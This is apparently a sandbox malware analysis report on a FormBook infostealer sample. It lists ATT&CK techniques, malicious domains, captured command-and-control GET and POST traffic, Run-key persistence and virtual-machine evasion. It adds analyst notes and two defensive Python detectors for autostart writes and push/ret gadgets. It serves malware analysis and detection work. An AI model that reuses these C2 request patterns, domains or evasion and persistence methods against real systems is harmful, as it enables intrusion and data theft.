
Analysis Report Scan_Doc_11052020.exe

Overview

Detection

Strategy    Score   Range     Whitelisted   Threat
Threshold   100     0 - 100   false         FormBook

Confidence

Strategy    Score   Range   Further Analysis Required?
Threshold   5       0 - 5   false

 Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
 Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
 Some HTTP requests failed (404). It is likely the sample will exhibit less behavior

Mitre Att&ck Matrix

Techniques carrying a number in parentheses were matched by the analysis; the number is the count the report attached to that technique. The remaining entries are the unmatched techniques the matrix lists for each tactic.

Initial Access: Valid Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Spearphishing Link, Spearphishing Attachment, Spearphishing via Service
Execution: Execution through Module Load (1), Exploitation for Client Execution (1), Windows Management Instrumentation, Scheduled Task, Command-Line Interface, Graphical User Interface, Scripting, Third-party Software
Persistence: Registry Run Keys / Startup Folder (1), Port Monitors, Accessibility Features, System Firmware, Shortcut Modification, Modify Existing Service, Path Interception, Logon Scripts
Privilege Escalation: Process Injection (512), Accessibility Features, Path Interception, DLL Search Order Hijacking, File System Permissions Weakness, New Service, Scheduled Task, Process Injection
Defense Evasion: Software Packing (1), Disabling Security Tools (1), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (2), Masquerading (1), Virtualization/Sandbox Evasion (3), Process Injection (512), DLL Side-Loading (1)
Credential Access: Credential Dumping (1), Network Sniffing, Input Capture, Credentials in Files, Account Manipulation, Brute Force, Two-Factor Authentication Interception, Bash History
Discovery: Security Software Discovery (231), File and Directory Discovery (2), System Information Discovery (112), Virtualization/Sandbox Evasion (3), Process Discovery (2), Remote System Discovery (1), Network Sniffing, Network Service Scanning
Lateral Movement: Remote File Copy (3), Remote Services, Windows Remote Management, Logon Scripts, Shared Webroot, Third-party Software, Pass the Hash, Remote Desktop Protocol
Collection: Man in the Browser (1), Data from Local System (1), Email Collection (1), Input Capture, Data Staged, Screen Capture, Email Collection, Clipboard Data
Exfiltration: Data Encrypted (1), Exfiltration Over Other Network Medium, Automated Exfiltration, Data Encrypted, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over Command and Control Channel, Exfiltration Over Alternative Protocol
Command and Control: Remote File Copy (3), Standard Cryptographic Protocol (1), Standard Non-Application Layer Protocol (4), Standard Application Layer Protocol (14), Standard Cryptographic Protocol, Commonly Used Port, Uncommonly Used Port, Standard Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: Modify System Partition, Device Lockout, Delete Device Data, Premium SMS Toll Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue

Signature Overview

AV Detection:

 Antivirus detection for URL or domain
  Source: http://www.brandbank.news/mq3/ Avira URL Cloud: Label: malware
  Source: http://www.brandbank.news/mq3/www.shimi783.info Avira URL Cloud: Label: malware
  Source: http://www.brandbank.news Avira URL Cloud: Label: malware
 Multi AV Scanner detection for domain / URL
  Source: http://www.porcber.com Virustotal: Detection: 6%
 Multi AV Scanner detection for dropped file
  Source: C:\Users\user\AppData\Local\Temp\Zhrptqdzh\vrhdctut50jxtp.exe Virustotal: Detection: 19%
  Source: C:\Users\user\AppData\Local\Temp\Zhrptqdzh\vrhdctut50jxtp.exe ReversingLabs: Detection: 35%
 Multi AV Scanner detection for submitted file
  Source: Scan_Doc_11052020.exe Virustotal: Detection: 19%
  Source: Scan_Doc_11052020.exe ReversingLabs: Detection: 35%
 Yara detected FormBook
  Source: Yara match File source: 0000000F.00000002.1123596075.00000000050C0000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 00000004.00000002.1194591234.0000000000B20000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 0000000F.00000002.1122903967.0000000004EB0000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 00000000.00000002.857272679.0000000005510000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 0000000E.00000002.1123325288.0000000005310000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 0000000F.00000002.1120293845.00000000037A5000.00000004.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 00000000.00000002.859171433.0000000005650000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 0000000E.00000002.1123113610.00000000051E0000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 0000000F.00000002.1122759975.0000000004D70000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 00000000.00000002.860529111.0000000005680000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 0000000E.00000002.1120571214.0000000003C25000.00000004.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 00000004.00000002.1194734032.0000000000B90000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 00000004.00000002.1194902186.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 00000011.00000002.1115593061.0000000000F00000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 0000000E.00000002.1123910075.0000000005600000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 00000000.00000002.850402740.0000000003EE5000.00000004.00000001.sdmp, type: MEMORY
  Source: Yara match File source: 15.2.vrhdctut50jxtp.exe.4d70000.3.unpack, type: UNPACKEDPE
  Source: Yara match File source: 14.2.vrhdctut50jxtp.exe.51e0000.3.unpack, type: UNPACKEDPE
  Source: Yara match File source: 15.2.vrhdctut50jxtp.exe.4d70000.3.raw.unpack, type: UNPACKEDPE
  Source: Yara match File source: 0.2.Scan_Doc_11052020.exe.5510000.3.raw.unpack, type: UNPACKEDPE
  Source: Yara match File source: 0.2.Scan_Doc_11052020.exe.5510000.3.unpack, type: UNPACKEDPE
  Source: Yara match File source: 14.2.vrhdctut50jxtp.exe.51e0000.3.raw.unpack, type: UNPACKEDPE
 Antivirus or Machine Learning detection for unpacked file
  Source: 15.2.vrhdctut50jxtp.exe.4d70000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
  Source: 14.2.vrhdctut50jxtp.exe.51e0000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
  Source: 0.2.Scan_Doc_11052020.exe.5510000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Networking:

 HTTP GET or POST without a user agent
  Source: global traffic HTTP traffic detected:
   GET /mq3/?fDK=BhjLRlh&SXGT2PEh=Rok90QOK6ea72UleUAJ4ErWaSqt/IQVB8JdCNgRpDbdf1LJgzNf1D86eRIdXJU+axZ+t HTTP/1.1
   Host: www.bzasd.com
   Connection: close
   Data Raw: 00 00 00 00 00 00 00
  Source: global traffic HTTP traffic detected:
   GET /mq3/?SXGT2PEh=r8Q75MIXz7zy5sB899Th1/k9+Lnr+VmPBQzoNFk56PWTbuYDB27UYmJg83KfwIIDO73Z&fDK=BhjLRlh HTTP/1.1
   Host: www.dllearn.com
   Connection: close
   Data Raw: 00 00 00 00 00 00 00
  Source: global traffic HTTP traffic detected:
   GET /mq3/?fDK=BhjLRlh&SXGT2PEh=Ucg4IdL9jFr4XeSjaPMyHB4uwBktJa1xNFlwHiqXLBzLuD0Ne+QKmAu6UBl6f+0aCpLv HTTP/1.1
   Host: www.axcyl.com
   Connection: close
   Data Raw: 00 00 00 00 00 00 00
 IP address seen in connection with other malware
  Source: Joe Sandbox View IP Address: 50.63.202.49
 Internet Provider seen in connection with other malware
  Source: Joe Sandbox View ASN Name: unknown
 Uses a known web browser user agent for HTTP communication
  Source: global traffic HTTP traffic detected:
   POST /mq3/ HTTP/1.1
   Host: www.dllearn.com
   Connection: close
   Content-Length: 182834
   Cache-Control: no-cache
   Origin: http://www.dllearn.com
   User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
   Content-Type: application/x-www-form-urlencoded
   Accept: */*
   Referer: http://www.dllearn.com/mq3/
   Accept-Language: en-US
   Accept-Encoding: gzip, deflate
  Source: global traffic HTTP traffic detected:
   POST /mq3/ HTTP/1.1
   Host: www.axcyl.com
   Connection: close
   Content-Length: 182834
   Cache-Control: no-cache
   Origin: http://www.axcyl.com
   User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
   Content-Type: application/x-www-form-urlencoded
   Accept: */*
   Referer: http://www.axcyl.com/mq3/
   Accept-Language: en-US
   Accept-Encoding: gzip, deflate
 Performs DNS lookups
 Source: unknown DNS traffic detected: queries for: www.bzasd.com
 Posts data to webserver
  Source: unknown HTTP traffic detected:
   POST /mq3/ HTTP/1.1
   Host: www.dllearn.com
   Connection: close
   Content-Length: 182834
   Cache-Control: no-cache
   Origin: http://www.dllearn.com
   User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
   Content-Type: application/x-www-form-urlencoded
   Accept: */*
   Referer: http://www.dllearn.com/mq3/
   Accept-Language: en-US
   Accept-Encoding: gzip, deflate
  Source: global traffic HTTP traffic detected:
   HTTP/1.1 404 Not Found
   Server: nginx
   Date: Tue, 12 May 2020 01:20:29 GMT
   Content-Type: text/html; charset=utf-8
   Transfer-Encoding: chunked
   Connection: close
   Vary: Accept-Encoding
 Urls found in memory or binary data

E-Banking Fraud:

Yara detected FormBook

System Summary:

Detected FormBook malware
Malicious sample detected (through community Yara rule)
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Scan_Doc_11052020.exe
Contains functionality to call native functions
Detected potential crypto function
 Found potential string decryption / allocating functions
 Source: C:\Windows\SysWOW64\systray.exe Code function: String function: 04D6B0E0 appears 176 times
 Source: C:\Windows\SysWOW64\systray.exe Code function: String function: 04DF5110 appears 38 times
 Source: C:\Windows\SysWOW64\systray.exe Code function: String function: 04DBDDE8 appears 48 times
 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: String function: 05F1DDE8 appears 48 times
 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: String function: 05ECB0E0 appears 176 times
 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: String function: 05F55110 appears 38 times
 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: String function: 05C1DDE8 appears 49 times
 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: String function: 0579DDE8 appears 49 times
 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: String function: 0574B0E0 appears 176 times
 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: String function: 05C55110 appears 38 times
 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: String function: 05BCB0E0 appears 176 times
 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: String function: 057D5110 appears 40 times
 The same three functions recur in every process at identical low-order offsets (xxxB0E0, xxx5110, xxxDDE8, with the same distances between them), which is consistent with one code module being mapped at a different base in each process rather than with separate implementations.
 Sample file name is different from the original file name gathered from version info
 Source: Scan_Doc_11052020.exe, 00000000.00000002.844244857.0000000000B1C000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameSuihzn.exeN vs Scan_Doc_11052020.exe
 Source: Scan_Doc_11052020.exe, 00000000.00000002.856731482.0000000005450000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamewEYbapqACmfn.exe4 vs Scan_Doc_11052020.exe
 Source: Scan_Doc_11052020.exe, 00000000.00000002.873153767.0000000005FBF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Scan_Doc_11052020.exe
 Source: Scan_Doc_11052020.exe, 00000000.00000002.855597802.00000000053C0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs Scan_Doc_11052020.exe
 Source: Scan_Doc_11052020.exe Binary or memory string: OriginalFilenameSuihzn.exeN vs Scan_Doc_11052020.exe
 Only the Suihzn.exe value (also present in the file on disk) and the wEYbapqACmfn.exe value from a memory region are attributable to the sample; ntdll.dll and mscorrc.dll are the version-info strings of system DLLs mapped into the process.
 Searches the installation path of Mozilla Firefox
 Source: C:\Windows\SysWOW64\systray.exe Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install Directory
 Tries to load missing DLLs
 Yara signature match
 Classification label
 Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@15/10@4/3
 Creates files inside the user directory
 Creates mutexes
 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3824:120:WilError_01
 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2680:120:WilError_01
 Both mutants are the WilError_01 synchronization objects that conhost.exe creates for itself; they are not sample-specific indicators.
 Creates temporary files
 PE file has an executable .text section and no other executable section
 Source: Scan_Doc_11052020.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
 Parts of this application are using the .NET runtime (probably coded in C#)
 Reads the hosts file
 Sample is known by Antivirus
 Source: Scan_Doc_11052020.exe Virustotal: Detection: 19%
 Source: Scan_Doc_11052020.exe ReversingLabs: Detection: 35%
 Spawns processes
 Uses an in-process (OLE) Automation server
 Writes ini files
 Uses Microsoft Silverlight
 Checks if Microsoft Office is installed
 PE file contains a COM descriptor data directory
 Source: Scan_Doc_11052020.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
 Contains modern PE file flags such as dynamic base (ASLR) or NX
 Source: Scan_Doc_11052020.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
 Binary contains paths to debug symbols
 Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.813305822.0000000007010000.00000002.00000001.sdmp
 Source: Binary string: cmmon32.pdb source: vrhdctut50jxtp.exe, 0000000F.00000002.1116411384.0000000000AC5000.00000004.00000020.sdmp
 Source: Binary string: cmmon32.pdbGCTL source: vrhdctut50jxtp.exe, 0000000F.00000002.1116411384.0000000000AC5000.00000004.00000020.sdmp
 Source: Binary string: wntdll.pdbUGP source: Scan_Doc_11052020.exe, 00000000.00000002.866787591.0000000005EA0000.00000040.00000001.sdmp, systray.exe, 00000004.00000002.1198574130.0000000004D40000.00000040.00000001.sdmp, vrhdctut50jxtp.exe, 0000000E.00000002.1124555745.0000000005CBF000.00000040.00000001.sdmp, vrhdctut50jxtp.exe, 0000000F.00000002.1123661907.0000000005720000.00000040.00000001.sdmp, cmmon32.exe, 00000011.00000002.1118553949.000000000502F000.00000040.00000001.sdmp
 Source: Binary string: wntdll.pdb source: vrhdctut50jxtp.exe, cmmon32.exe, 00000011.00000002.1118553949.000000000502F000.00000040.00000001.sdmp
 Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.813305822.0000000007010000.00000002.00000001.sdmp
 The wntdll.pdb string is present in a memory region of every process in the chain (the sample, systray.exe, both vrhdctut50jxtp.exe instances and cmmon32.exe); check whether this is a second, manually mapped copy of ntdll rather than the loaded system module, since that is how user-mode hook evasion is usually implemented. The cmmon32.pdb string in the memory of vrhdctut50jxtp.exe (process 0F) is consistent with it having mapped cmmon32.exe, which then appears as process 11, as an injection target. The wscui.pdb strings come from explorer.exe's own memory and are not related to the sample.

Data Obfuscation:

 Uses code obfuscation techniques (call, push, ret)
 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05F1DE2D push ecx; ret 0_2_05F1DE40
 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05364E9C push 2C00005Eh; iretd 0_2_05364EA1
 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_053639A3 push 850FD83Bh; ret 0_2_053639A9
 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_0536D292 push 8BD68B50h; iretd 0_2_0536D2A4
 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04DBDE2D push ecx; ret 4_2_04DBDE40
 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_00B2D9CD push ds; retf 4_2_00B2D9CE
 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_00B39A82 push eax; ret 4_2_00B39A88
 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_00B39A8B push eax; ret 4_2_00B39AF2
 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_00B252F9 pushfd ; retf 4_2_00B252EA
 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_00B252E9 pushfd ; retf 4_2_00B252EA
 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_00B39AEC push eax; ret 4_2_00B39AF2
 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_00B39A35 push eax; ret 4_2_00B39A88
 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_00B2521A push esi; iretd 4_2_00B25226
 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05C1DE2D push ecx; ret 14_2_05C1DE40
 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_0579DE2D push ecx; ret 15_2_0579DE40
 Treat the immediate-operand hits with care: the bytes of 850FD83Bh (3B D8 0F 85) decode as cmp ebx, eax followed by the start of a jnz rel32, and those of 8BD68B50h (50 8B D6 8B) as push eax; mov edx, esi; ..., so these may be misaligned decodes of ordinary code rather than deliberate push/ret obfuscation. Confirm them in a disassembler with correct function boundaries. The push ecx; ret pair at offset xxxDE2D recurs in all four processes, again pointing at one shared module.

Persistence and Installation Behavior:

 Drops PE files

Boot Survival:

 Creates an autostart registry key
 Source: C:\Windows\SysWOW64\systray.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run WDTPZDJ0IJKL
 Source: C:\Windows\SysWOW64\systray.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run WDTPZDJ0IJKL
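Detection logic for this persistence step, as an added example that is not part of the report or of Joe Sandbox: it runs over constructed Sysmon-style registry value-set events (Event ID 13; the field names Image, TargetObject and Details are Sysmon's) and flags a Run value when the writing process is a Windows system binary that has no business setting autostart entries (the report shows C:\Windows\SysWOW64\systray.exe writing HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\WDTPZDJ0IJKL), when the value name looks machine-generated, or when the target executable sits in a random-looking directory under Program Files. The value data pointing at C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe is an assumption, since the report lists the key and value name but not the data, and the allow-list of legitimate system writers is a starting point to tune, not a definitive list.

```python
r"""Flag autostart Run values written by an unexpected process.

Added example, not Joe Sandbox or report code. Runs over constructed
Sysmon-style registry value-set events (Event ID 13). The report shows
C:\Windows\SysWOW64\systray.exe writing
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\WDTPZDJ0IJKL;
the value data used below is an assumption.
"""
from __future__ import annotations

import re

RUN_VALUE_RE = re.compile(
    r"\\Software\\(?:Wow6432Node\\)?Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\([^\\]+)$",
    re.IGNORECASE,
)
SYSTEM_BINARY_RE = re.compile(r"^c:\\windows\\(?:system32|syswow64)\\([^\\]+)$", re.IGNORECASE)
EXE_IN_DATA_RE = re.compile(r'^\s*"?([^"]+?\.exe)', re.IGNORECASE)

# System binaries that legitimately set Run values; tune for your estate.
ALLOWED_SYSTEM_WRITERS = {"reg.exe", "regedit.exe", "msiexec.exe", "svchost.exe", "runonce.exe"}


def looks_random(token: str) -> bool:
    """Heuristic for generated names: 8+ chars with under 20% vowels
    (WDTPZDJ0IJKL and Zhrptqdzh qualify, OneDrive does not)."""
    letters = [c for c in token if c.isalpha()]
    if len(token) < 8 or not letters:
        return False
    return sum(c.lower() in "aeiou" for c in letters) / len(letters) < 0.2


def evaluate(event: dict) -> list[str]:
    """Return the reasons an Event ID 13 record is suspicious (empty if none)."""
    if event.get("EventID") != 13:
        return []
    m = RUN_VALUE_RE.search(event.get("TargetObject", ""))
    if not m:
        return []
    value_name = m.group(1)
    reasons = []
    writer = SYSTEM_BINARY_RE.match(event.get("Image", ""))
    if writer and writer.group(1).lower() not in ALLOWED_SYSTEM_WRITERS:
        reasons.append(f"Run value set by system binary {writer.group(1)} (possible injected host)")
    if looks_random(value_name):
        reasons.append(f"random-looking value name {value_name}")
    exe = EXE_IN_DATA_RE.match(event.get("Details", ""))
    if exe:
        parts = exe.group(1).split("\\")
        # directory directly under Program Files / Program Files (x86)
        if len(parts) >= 3 and parts[1].lower().startswith("program files") and looks_random(parts[2]):
            reasons.append(f"autostart target in random-looking directory {parts[2]}")
    return reasons


def triage(events: list[dict]) -> list[tuple[str, str, list[str]]]:
    """(Image, value name, reasons) for every flagged event."""
    flagged = []
    for ev in events:
        reasons = evaluate(ev)
        if reasons:
            flagged.append((ev["Image"], RUN_VALUE_RE.search(ev["TargetObject"]).group(1), reasons))
    return flagged


# Constructed events; the SID is made up.
SID = r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001"
RUN = SID + r"\Software\Microsoft\Windows\CurrentVersion\Run"
EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\SysWOW64\systray.exe",
     "TargetObject": RUN + r"\WDTPZDJ0IJKL",
     "Details": r"C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe"},  # value data assumed
    {"EventID": 13, "Image": r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDriveSetup.exe",
     "TargetObject": RUN + r"\OneDrive",
     "Details": r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": RUN + r"\Acme Backup",
     "Details": r"C:\Program Files\Acme Backup\agent.exe"},
    {"EventID": 12, "Image": r"C:\Windows\SysWOW64\systray.exe",  # key create, not a value set
     "TargetObject": RUN, "Details": ""},
]

if __name__ == "__main__":
    for image, name, reasons in triage(EVENTS):
        print(f"{image} -> Run\\{name}")
        for r in reasons:
            print("   ", r)
```

Only the systray.exe event is flagged, on all three grounds; the OneDrive and reg.exe writes pass, and the key-creation event is ignored because only value sets carry the autostart data.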

Hooking and other Techniques for Hiding and Protection:

 Disables application error messages (SetErrorMode)

Malware Analysis System Evasion:

 Tries to detect virtualization through RDTSC time measurements
 Contains capabilities to detect virtual machines
 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0
 Value 0 under Services\Disk\Enum is the PnP device instance ID of the first disk; on a virtual machine it carries the hypervisor's vendor string (for example VMware, VBOX or QEMU), which is why the query is a common VM check.
 Contains functionality for execution timing, often used to detect debuggers
 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05F95595 rdtsc 0_2_05F95595
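The scanner below is an added example, not Joe Sandbox's or the report's code. It walks raw 32-bit x86 bytes and flags the gadget shapes listed earlier under "Uses code obfuscation techniques (call, push, ret)" (a push of an immediate, register, segment register or the flags immediately followed by ret, retf or iretd, resolving the jump target of push imm32; ret) together with the rdtsc instruction behind the execution-timing entry above. The input bytes are constructed for the demonstration. It is a linear byte match, not a disassembly, so a hit can be a misaligned decode of ordinary code; confirm each one in a disassembler with correct function boundaries.

```python
"""Flag push/ret-family obfuscation gadgets and rdtsc in raw 32-bit x86 code.

Added example, not Joe Sandbox or report code. A linear byte scan: it does not
decode instruction boundaries, so confirm every hit in a disassembler.
"""
import struct

RET_FAMILY = {0xC3: "ret", 0xC2: "ret imm16", 0xCB: "retf", 0xCA: "retf imm16", 0xCF: "iretd"}
REGS32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
PUSH_REG = {0x50 + i: f"push {r}" for i, r in enumerate(REGS32)}
# single-byte segment-register pushes valid in 32-bit mode
PUSH_SEG = {0x06: "push es", 0x0E: "push cs", 0x16: "push ss", 0x1E: "push ds"}


def scan_gadgets(code: bytes, base: int = 0):
    """Return (address, mnemonic text, resolved target or None) per gadget.

    Gadgets: push <imm32|imm8|reg|seg>; ret-family, pushfd; ret-family, and
    the two-byte rdtsc instruction (0F 31) used for timing checks.
    """
    hits = []
    i, n = 0, len(code)
    while i < n:
        op = code[i]
        # rdtsc
        if op == 0x0F and i + 1 < n and code[i + 1] == 0x31:
            hits.append((base + i, "rdtsc", None))
            i += 2
            continue
        # push imm32; ret  -> an obfuscated absolute jump to imm32
        if op == 0x68 and i + 5 < n and code[i + 5] in RET_FAMILY:
            target = struct.unpack_from("<I", code, i + 1)[0]
            hits.append((base + i, f"push 0x{target:08X}; {RET_FAMILY[code[i + 5]]}", target))
            i += 6
            continue
        # push imm8 (sign-extended to 32 bits); ret
        if op == 0x6A and i + 2 < n and code[i + 2] in RET_FAMILY:
            target = struct.unpack_from("<b", code, i + 1)[0] & 0xFFFFFFFF
            hits.append((base + i, f"push 0x{target:08X}; {RET_FAMILY[code[i + 2]]}", target))
            i += 3
            continue
        # push reg / push seg / pushfd followed by a ret-family opcode
        name = PUSH_REG.get(op) or PUSH_SEG.get(op) or ("pushfd" if op == 0x9C else None)
        if name and i + 1 < n and code[i + 1] in RET_FAMILY:
            hits.append((base + i, f"{name}; {RET_FAMILY[code[i + 1]]}", None))
            i += 2
            continue
        i += 1
    return hits


# Constructed test bytes mirroring the gadget shapes listed in the report.
SAMPLE = bytes.fromhex(
    "51C3"          # push ecx; ret
    "685E00002CCF"  # push 2C00005Eh; iretd
    "1ECB"          # push ds; retf
    "9CCB"          # pushfd; retf
    "0F31"          # rdtsc
    "90"            # nop (filler)
    "56CF"          # push esi; iretd
)

if __name__ == "__main__":
    for addr, text, target in scan_gadgets(SAMPLE, base=0x00B25000):
        extra = f"  -> jump target 0x{target:08X}" if target is not None else ""
        print(f"{addr:08X}  {text}{extra}")
```

Run against a dumped code region, the resolved target of each push imm32; ret tells you whether the gadget lands inside the module (a real obfuscated branch) or at an address that is nonsense for the binary (a misaligned decode, like the 850FD83Bh case above).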
 Found large amount of non-executed APIs
 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe API coverage: 2.3 %
 Source: C:\Windows\SysWOW64\systray.exe API coverage: 5.0 %
 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe API coverage: 2.2 %
 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe API coverage: 2.2 %
 May sleep (evasive loops) to hinder dynamic analysis
 Sample execution stops while process was sleeping (likely an evasion)
 Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
 Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
 May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
 Source: vrhdctut50jxtp.exe, 0000000F.00000002.1117943880.00000000027A0000.00000004.00000001.sdmp Binary or memory string: VMware
 Source: vrhdctut50jxtp.exe Binary or memory string: 01lXXnOEvEHTYeOrs3hGfs4waIYQPAlFaQOCvi6ewWunD2FaSpwFefR1UvSFd0GKq7C6cTAXF8SH0XrfL8k6xDYxx4Q+GjACxSCw3OePvIU77FyXENgPYQqlZnxb1jTMpUD4FAwv3nKCe/3LSahplmkThDkmhhV0ZyDAMCatySM0Q0v6b3UDO7j4UzOaV517j+2bgoohPh9j8rkMayq3185WcNDENX6VQZQnzNpZQvPWuiXqROn/DlSYCVP8Yoay0yFK
 Source: vrhdctut50jxtp.exe Binary or memory string: xM0LqGj6LjCrw1w4Y9EDPz9F7Zgl2+0A51M/EsSGFCADue5SU1bWhFrvRMo2sv3k8xtOFUbFdSbnV3M6H5AyxTZ57z6XjTXx9/ke9WA1nggpAHVlbYSyYFbxdNBhe01HZkSPRAEOM+aI+BAUikac707YEwIG0/w8nHj+03KYP80NHgFsuPY6up0sx5W1AR0Ab7UE47UTX88St1OzzIJ7E0mTp6024W65nvogC8ngZH4UOZCWodDFq3mKqCkpp2CWLYrf
 Source: explorer.exe, 00000002.00000000.813996700.0000000007340000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
 Source: explorer.exe, 00000002.00000000.813996700.0000000007340000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
 Source: explorer.exe, 00000002.00000000.813996700.0000000007340000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
 Source: explorer.exe, 00000002.00000000.813996700.0000000007340000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
 Of these, only the "VMware" string in the vrhdctut50jxtp.exe region supports the signature directly. The four Hyper-V messages are standard Windows error strings read from explorer.exe's own memory, not artifacts of the sample, and the two base64-looking strings from vrhdctut50jxtp.exe are opaque blobs whose relevance is unconfirmed until they are decoded.
